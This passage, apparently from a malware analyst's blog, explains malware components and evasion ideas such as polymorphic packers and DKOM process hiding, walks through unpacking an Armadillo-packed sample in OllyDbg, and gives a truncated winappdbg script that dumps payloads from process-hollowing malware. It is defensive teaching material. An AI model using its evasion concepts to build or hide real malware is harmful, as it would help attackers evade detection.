<li><span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Payload </span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">is the core component of the malware. Payload executes the final intention of the malware. A malware may steal credentials from browser, steal banking credentials . Malware should be classified or provided name based on the payload .</span></li>
<ul>
<li><span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Password Stealer(PWS)</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">-steals passwords from browser,ftp clients etc</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Banking Malware</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">-Specially meant to steal banking credentials or do a man in the middle attack.</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Ransomware</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">-Asks the victim to pay ransom. Usually does by hijacking sensitive data or system resources.</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Adware-</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">displays unwanted advertisement to victims</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Point of Sales-</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">This is used to steal credit card information from system linked to POS devices</span></li>
</ul>
</ul>
<br />
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Packer</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> is a enevepe over the payload. While reverse engineering malware , you need to remove this envelope in order to see the actual payload or functionality of the malware. Packer has algorithms which are used to compress code . Since the actual malware code is compressed by packer, it’s hard to see the actual payload by static analysis(I will talk about static analysis of later in the article. For the time being consider static analysis in this case as viewing an executable in an hex editor). Packer is a program that takes an executable as input and produces packed executable. The original executable and the packed executable will look different if static analysis is done on it. A polymorphic packer takes one executable program as input and creates multiple(can be in millions) packed executables which look different from each other with static analysis .These executable are released in the wild through various channels like spams , exploit kit. These packed executables are different from other if the analysts performs static analysis on them but their behavior (dynamic analysis would be same). So if an antivirus engineer writes static detection signature on few of the packed executables ,there are chances that the signature may not detect all the executables created by the polymorphic packer . This is one of the methods by which malware can evade static antivirus signatures.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img height="360" src="https://lh5.googleusercontent.com/QbW8AYTzCWUzsy05nztA2IHDvJnC-WTqIxqgRbZuDs8S1fg6EabScYxhQ3pySVbNX2I5x_VWHjuBQ-9kr8GnFuZ25TT4WPDH2ODyzh4xj5pWV2dghqKOtHggyljCO_8DGMtTSpel" style="border: none; margin-left: auto; margin-right: auto;" width="624" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Polymorphic Packer</td></tr>
</tbody></table>
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Persistence:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware needs to stay in the system and sustain reboots. A banking malware or stealer needs to stay active in the system even after reboot. The techniques with which malware survives reboot are called persistence mechanism. Most of the malware exploit the operating system features to persist .</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Armoring</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware’s don’t want to analysed or detected. Security researchers try to break the maware. Armoring is used by malware to protect itself . Anti-debugging,VM-Detection , Sandbox detection , Analysis tool detection are various armoring techniques employed by malware.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Stealth</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malwares need to hide themselves in the system so that user does not suspect it. Stealth technique can range from simply changing the file property hidden to Code injection techniques and Rootkits can be considered as stealth mechanism . Often Rootkit is considered as type of malware but I would say rootkit is a technique to hide a malware. The payload could be something like a banking trojan that wants to hide itself . Most of the rootkits alter the functionality of the API’s or data structures used by operating system . For example windows task manager refers to a double linked list in which nodes represent a process. Removing a node from the linked list can hide a process . This rootkit technique is called DKOM. </span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Communication</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malwares would like to communicate with the hacker through command and control servers (CnC). The reason could be anything uploading stolen data, receive commands etc.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Propagation</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware need to spread across computers in a network or outside network . Autorun worms used pen drive to spread from one machine to another. The infamous Wannacry used Eternal Blue exploit to propagate through the network . PE File infection(File Infectors) is a spreading mechanism used by </span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: red; font-family: "arial"; font-size: 14pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Malware Analysis</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware analysis is done in order to find if a program is malware and if so find the impact on the system.</span><br />
<ol style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Static</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Dynamic </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Reverse Engineering</span></li>
</ol>
</div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Static Analysis</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Static analysis is done without executing the sample. A sample is opened in a static analysis tool to view static properties. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">It’s hard to derive conclusion from static analysis as malwares maybe obfuscated. Then why do we perform static analysis?</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Static analysis can form the basis of dynamic analysis. Here is an analysis step. I get a sample and check its first few bytes in a hex editor . I see that first MZ at the start of the file. I consider this as a windows executable . Then I check if it 32 bit or 64 bit executable. If it is 64 bit,I would use a 64 bit windows OS for dynamic analysis.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img height="460" src="https://lh3.googleusercontent.com/Fl5n9X0H_MZzOb_9xCFE6yhA3xP1JMTaDc8-92M278PLGbv0kTiKrABId24P7X7CichHcasjDuEb1Oi35ZB1KJKRBPB9YDzdi19WJmPoFx3ia-m8GfWu6N22EheAE-yKbjRjkHfB" style="border: none; margin-left: auto; margin-right: auto;" width="624" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Malware Analysis Steps</td></tr>
</tbody></table>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">If I find a file is a microsoft document file(.docx) then I would need to install a microsoft word in my analysis machine for further dynamic analysis.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Dynamic Analysis</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Dynamic analysis is performed in order to find the changes done by the malware to the system. The changes can include :</span><br />
<ul style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">file modification </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">configuration changes </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">network communication </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Process changes -code injections,API hooks</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Mutexes created</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">System code modifications(kernel level API hooks and data structure modifications)</span></li>
</ul>
</div>
<br />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Reverse Engineering</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Reverse Engineering is performed if it is hard to conclude from dynamic analysis . A malware may not execute completely if it detects virtual machine environment(armoring) hence we won’t get conclusive results from dynamic analysis . In this case reverse engineering is performed to locate the code that detects virtual machines and patch the code in order to execute the malware . There can be many other purposes of reverse engineering:</span><br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Finding out algorithms used my malwares</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Writing better antivirus signatures</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Finding out more secrets in malware like similarity with any existing malware used in some attack</span></li>
</ul>
</div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: red; font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"> Malware Analysis Training:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">All the topics are covered in detail my training. Apart from this malware detection is also included in the training. Contact me </span><a href="mailto:abhijit.mohanta.15.08@gmail.com" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">abhijit.mohanta.15.08@gmail.com</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> for training's.</span></div>
</div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com0tag:blogger.com,1999:blog-9205939188428310956.post-69338319784239664452018-04-23T01:24:00.002-07:002018-04-23T01:27:29.191-07:00<div dir="ltr" style="text-align: left;" trbidi="on">
my book on Ransomware<br />
<div dir="ltr" id="docs-internal-guid-d975b279-f19a-3344-0338-7cf568705f99" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><a href="https://www.amazon.in/Preventing-Ransomware-Understand-remediate-ransomware/dp/1788620607">https://www.amazon.in/Preventing-Ransomware-Understand-remediate-ransomware/dp/1788620607</a></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg_NQrfhY4hLiIZCy4NbXCNJh5odbxq5-FMtsaqsBABkg1Zk-9VfquXeSfgd-MOahYCKe5-PTKQGzWLJmhfjCCuZuvZIXLdWg9S5rwksp1unMu6obO9l-RqHzv68heCdMm-IGoc0VA3eSA/s1600/4193Zq3AgqL._SX404_BO1%252C204%252C203%252C200_.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="406" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg_NQrfhY4hLiIZCy4NbXCNJh5odbxq5-FMtsaqsBABkg1Zk-9VfquXeSfgd-MOahYCKe5-PTKQGzWLJmhfjCCuZuvZIXLdWg9S5rwksp1unMu6obO9l-RqHzv68heCdMm-IGoc0VA3eSA/s320/4193Zq3AgqL._SX404_BO1%252C204%252C203%252C200_.jpg" width="259" /></a></div>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Hope you would love to read it.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span> </div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span> </div>
</div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com1tag:blogger.com,1999:blog-9205939188428310956.post-55775261954507486562017-03-03T22:57:00.003-08:002017-03-03T22:57:41.961-08:00Unpacking Malware in minutes<div dir="ltr" style="text-align: left;" trbidi="on">
Many tricks can be devised to unpack malware. This trick is applicable to
malware that overwrite their image header while unpacking. <br />
sample used:<br />
<b>
</b>
<b>sha1:<a href="https://www.virustotal.com/intelligence/search/?query=microsoft%3Akuluoz#sha256">320fe97d257b99edb4089daea01fce31a13eabaa850ccae9e8b7e59342cb31c7</a>
</b><br />
<b>md5:<a href="https://www.virustotal.com/intelligence/search/?query=microsoft%3Akuluoz#md5">dca9106dc8556f9a15d7e18b4fad5d44</a>
</b><br />
This is an armadillo packer. Let’s check the PE header of the packed file.
You can use tools like CFF explorer,hiew and many others.
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgescKCS7P80d2iw1aGTE0oPxfN3SXDe8LZX9C9M6R2NAaRciwD3rg4r-bAFepQ89GC-J6ZyggfF1hyphenhyphenDldIoXGoHEztw3mdn0Qj0tPZU8A28nSzJZZbeFf6oKTZ9IPBP-RUPvS9B5RS0ZiT/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="109" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgescKCS7P80d2iw1aGTE0oPxfN3SXDe8LZX9C9M6R2NAaRciwD3rg4r-bAFepQ89GC-J6ZyggfF1hyphenhyphenDldIoXGoHEztw3mdn0Qj0tPZU8A28nSzJZZbeFf6oKTZ9IPBP-RUPvS9B5RS0ZiT/s320/1.png" width="320" /></a></div>
<b><a href="https://www.blogger.com/null"><br /></a></b>
<b><a href="https://www.blogger.com/null"><br /></a></b>
<b><a href="https://www.blogger.com/null"><br /></a></b>
<b><a href="https://www.blogger.com/null"><br /></a></b>
<b><a href="https://www.blogger.com/null"><br /></a></b>
<b><a href="https://www.blogger.com/null"><br /></a></b>
<a href="https://www.blogger.com/null"><br /></a>
<br />
Fig : PE header- entry point 0x1D16<br />
<b><br />
</b>Now load the file in Ollydbg. <br />
Place a breakpoint on ExitProcess()<br />
Press F9 to execute. Allow the the sample to execute till it hits ExitProcess
so that it unpacks. You can check the memory strings in process explorer to see
<br />
if the sample has unpacked. you would see a difference in static <br />
<b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKrqliIdAsk1zjRYfJdTRxQYYmfC30UFdmHw0B1aINyQ3pKzn8M_GiUwO1Zf23ETca2_yEGogymS58kPxCu-8neMJuduMzkS6iP4E4SlDcmo4UaRfifzkmLwj9gwVe5GKlg5B_e4T_EmgQ/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKrqliIdAsk1zjRYfJdTRxQYYmfC30UFdmHw0B1aINyQ3pKzn8M_GiUwO1Zf23ETca2_yEGogymS58kPxCu-8neMJuduMzkS6iP4E4SlDcmo4UaRfifzkmLwj9gwVe5GKlg5B_e4T_EmgQ/s320/2.png" width="320" /></a></div>
<a href="https://www.blogger.com/null"><br /></a>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
</b><br />
<br />
Fig: memory string in process Explorer<br />
<br />
Now dump the header from memory .I have used process hacker for the purpose.
Other tools can also be used.<br />
<b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrojP92v9uHt84MOxoH37Xs1IvMSu8NSUWAgzxHYIuQs5F7GpJwTQ-IDA4-pBEvbXfLHEX0uSQypM2lgodKZXaiYvajfwJVFm0bwBu13Obs9gkip7-qvEOFU4TuUQbfRu7TP-F1KW3VDG/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrojP92v9uHt84MOxoH37Xs1IvMSu8NSUWAgzxHYIuQs5F7GpJwTQ-IDA4-pBEvbXfLHEX0uSQypM2lgodKZXaiYvajfwJVFm0bwBu13Obs9gkip7-qvEOFU4TuUQbfRu7TP-F1KW3VDG/s320/3.png" width="320" /></a></div>
<a href="https://www.blogger.com/null"><br /></a>
<br />
<br />
<br />
<br />
</b><br />
<br />
<br />
Fig:Process Hacker dump header from memory<br />
<br />
Now see the dumped header Entry Point<br />
<b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCZiSsVkZwCkNuK5GhylLy-Uc51iZolYNYS-GbMa3aQC2ZWbYbmFC2r5mBgmlPTAVN1a2yG3fpg1x0IBXJ40F9FxF56rs8wS3XCx-qizI4DX2TSLYiYX9sHmKty6SqOp5rXtDcsA7r763k/s1600/4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCZiSsVkZwCkNuK5GhylLy-Uc51iZolYNYS-GbMa3aQC2ZWbYbmFC2r5mBgmlPTAVN1a2yG3fpg1x0IBXJ40F9FxF56rs8wS3XCx-qizI4DX2TSLYiYX9sHmKty6SqOp5rXtDcsA7r763k/s320/4.png" width="320" /></a></div>
<a href="https://www.blogger.com/null"><br /></a>
<br />
<br />
<br />
<br />
<br />
</b><br />
<br />
Fig dumped header EP-0x4C00<br />
<br />
The image base of process when loaded in Olly in 0x400000<br />
Restart ollyDbg and set a Hardware Breakpoint on execute at 0x404C00(image
base + RVA of EP in unpacked header 0x400000+0x4c00)<br />
<b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgODc8Lp3SmSvWTrM98kulmBCV5_wbt7IFDEsEb5H1tCeVUc846UBSzwU1-5kqjcnry_gIYNYbilCKEl7_vfpe5dahtAOvqFH8dOAmgniQEsux1iXKN4ukGeTH_8ciM7PawrEgnjLHK5dGD/s1600/5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgODc8Lp3SmSvWTrM98kulmBCV5_wbt7IFDEsEb5H1tCeVUc846UBSzwU1-5kqjcnry_gIYNYbilCKEl7_vfpe5dahtAOvqFH8dOAmgniQEsux1iXKN4ukGeTH_8ciM7PawrEgnjLHK5dGD/s320/5.png" width="320" /></a></div>
<a href="https://www.blogger.com/null"><br /></a>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
</b><br />
Fig: ollydbg set hardware breakpoint on expected OEP<br />
<br />
Now press F9 to execute. <br />
Bam! you land up the actual OEP. You can see meaningful code at the point<br />
<b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-qeOYuIwRts-Q1IWbE3VFJysppc1A2uaXtRYXzh84cN0p9dhh0N8rguPLj-mRCl_iaxe2MuQ-e-1cmsakAscG4g_96kPtJZNOD_F7Vrwi6GFIFMdI2RtoR9yPoa5txGotjrCkBM3S-K9b/s1600/6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-qeOYuIwRts-Q1IWbE3VFJysppc1A2uaXtRYXzh84cN0p9dhh0N8rguPLj-mRCl_iaxe2MuQ-e-1cmsakAscG4g_96kPtJZNOD_F7Vrwi6GFIFMdI2RtoR9yPoa5txGotjrCkBM3S-K9b/s320/6.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
</b><br />
Fig: Olly Dbgbreaks at OEP<br />
<br />
Now you can dump the unpacked file and analyse. OllyDumpEx is one of best
options to unpack. you need not fix imports if you do that.<br />
Hope this helps .</div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com3tag:blogger.com,1999:blog-9205939188428310956.post-18071234104836461462014-10-04T06:09:00.001-07:002014-10-04T06:12:43.915-07:00Dynamic Automatic Unpacking for RunPE,Process Hollowing Malware(winappdbg)<p> </p> <p>The code shows simple usage of winappdbg. This can be implemented in other debugger in Pydbg.</p> <p>Process Hollowing ,RunPE or Process Forking are more or less the same terms used for the same technique. In this method a malware creates a process in suspended mode then injects decrypted PE into the suspended process and then executes it.</p> <p>There are lot of POCs for process hollowing in internet.</p> <p>One of the method is as follows:</p> <p>1)Process Created in Suspended mode</p> <p>2)Call to GetThreadContext</p> <p>3)Call VirtualAlloc and copy unpacked PE to it</p> <p>4)Call WriteProcessMemory to write the decrypted PE to suspended process</p> <p>5)Call SetThreadContext</p> <p>6) Call to ResumeThread</p> <p>My objective is to dump the unpacked PE in Step 3 to disk.</p> <p>Following is code. This is just a crude code. I have not done any sort to validation and error checking here. I have used some code available on internet.Feel free to modify the code.</p> <p><strong>NOTE:</strong> This wont work for all types of process hollowing</p> <p><strong>CODE:</strong></p> <div class="csharpcode"><pre class="alt">#please pass absolute path of the file to be unpacked</pre><pre>from winappdbg import Debug, EventHandler,Process, System, CrashDump, HexInput, HexDump,win32</pre><pre class="alt"> </pre><pre> </pre><pre class="alt">def process_read( pid, address, length ):</pre><pre> </pre><pre class="alt"> process = Process( pid )</pre><pre> # Read the process memory.</pre><pre class="alt"> data = process.read( address, length )</pre><pre> <span class="kwrd">return</span> data</pre><pre class="alt"> </pre><pre>def action_WriteProcessMemoryW(<span class="kwrd">event</span>):</pre><pre class="alt"> # Get the <span class="kwrd">return</span> address of the call</pre><pre> address = <span class="kwrd">event</span>.get_thread().read_stack_dwords(1)[0]</pre><pre class="alt"> fo = open(<span class="str">"C:/unpacked.bin"</span>, <span class="str">"w"</span>)</pre><pre> </pre><pre class="alt"> # Get the process and thread IDs</pre><pre> pid = <span class="kwrd">event</span>.get_pid()</pre><pre class="alt"> tid = <span class="kwrd">event</span>.get_tid()</pre><pre> </pre><pre class="alt"> process = Process(pid)</pre><pre> </pre><pre class="alt"> bufferAddr=<span class="kwrd">event</span>.get_thread().read_stack_dwords(6)[3] #6 <span class="kwrd">is</span> no of dwords grabbed from stack [0] <span class="kwrd">is</span> retuen addr [3] <span class="kwrd">is</span> 3rd argument</pre><pre> print hex(bufferAddr)</pre><pre class="alt"> print <span class="str">"xxxxxxx"</span></pre><pre> memoryMap = process.get_memory_map()</pre><pre class="alt"> readable = 0</pre><pre> writeable = 0</pre><pre class="alt"> executable = 0</pre><pre> <span class="kwrd">private</span> = 0</pre><pre class="alt"> mapped = 0</pre><pre> image = 0</pre><pre class="alt"> total = 0</pre><pre> <span class="kwrd">for</span> mbi <span class="kwrd">in</span> memoryMap:</pre><pre class="alt"> #print hex(mbi.BaseAddress)</pre><pre> <span class="kwrd">if</span> mbi.BaseAddress == bufferAddr:</pre><pre class="alt"> print <span class="str">"dumping data"</span></pre><pre> print hex(mbi.BaseAddress)</pre><pre class="alt"> print hex(mbi.RegionSize)</pre><pre> data=process_read(pid,mbi.BaseAddress,mbi.RegionSize)</pre><pre class="alt"> fo.write(data)</pre><pre> fo.close()</pre><pre class="alt"> </pre><pre> </pre><pre class="alt"># This function will be called when our breakpoint <span class="kwrd">is</span> hit</pre><pre>def action_CreateProcessW( <span class="kwrd">event</span> ):</pre><pre class="alt"> </pre><pre> </pre><pre class="alt"> address = <span class="kwrd">event</span>.get_thread().read_stack_dwords(1)[0]</pre><pre> # Get the process and thread IDs</pre><pre class="alt"> pid = <span class="kwrd">event</span>.get_pid()</pre><pre> tid = <span class="kwrd">event</span>.get_tid()</pre><pre class="alt"> </pre><pre> </pre><pre class="alt"><span class="kwrd">class</span> MyEventHandler( EventHandler ):</pre><pre> </pre><pre class="alt"> def load_dll( self, <span class="kwrd">event</span> ):</pre><pre> </pre><pre class="alt"> # Get the <span class="kwrd">new</span> module <span class="kwrd">object</span></pre><pre> module = <span class="kwrd">event</span>.get_module()</pre><pre class="alt"> </pre><pre> # If it's kernel32.dll...</pre><pre class="alt"> <span class="kwrd">if</span> module.match_name(<span class="str">"kernel32.dll"</span>):</pre><pre> </pre><pre class="alt"> # Get the process ID</pre><pre> pid = <span class="kwrd">event</span>.get_pid()</pre><pre class="alt"> </pre><pre> # Get the address of CreateFile</pre><pre class="alt"> address = module.resolve( <span class="str">"CreateProcessW"</span> )</pre><pre> addressWPW = module.resolve( <span class="str">"WriteProcessMemory"</span> )</pre><pre class="alt"> </pre><pre> # Set a breakpoint at CreateFile</pre><pre class="alt"> <span class="kwrd">event</span>.debug.break_at( pid, address, action_CreateProcessW )</pre><pre> <span class="kwrd">event</span>.debug.stalk_at( pid, addressWPW, action_WriteProcessMemoryW )</pre><pre class="alt"> </pre><pre> </pre><pre class="alt"> </pre><pre> </pre><pre class="alt">def simple_debugger( argv ):</pre><pre> </pre><pre class="alt"> # Instance a Debug <span class="kwrd">object</span>, passing it the MyEventHandler instance</pre><pre> debug = Debug( MyEventHandler() )</pre><pre class="alt"> <span class="kwrd">try</span>:</pre><pre> </pre><pre class="alt"> debug.execv( argv )</pre><pre> </pre><pre class="alt"> debug.loop()</pre><pre> </pre><pre class="alt"> # Stop the debugger</pre><pre> <span class="kwrd">finally</span>:</pre><pre class="alt"> debug.stop()</pre><pre> </pre><pre class="alt"> </pre><pre># When invoked from the command line,</pre><pre class="alt"># the first argument <span class="kwrd">is</span> an executable file theat needs tp be unpacked. Please provide absolute path</pre><pre># and the 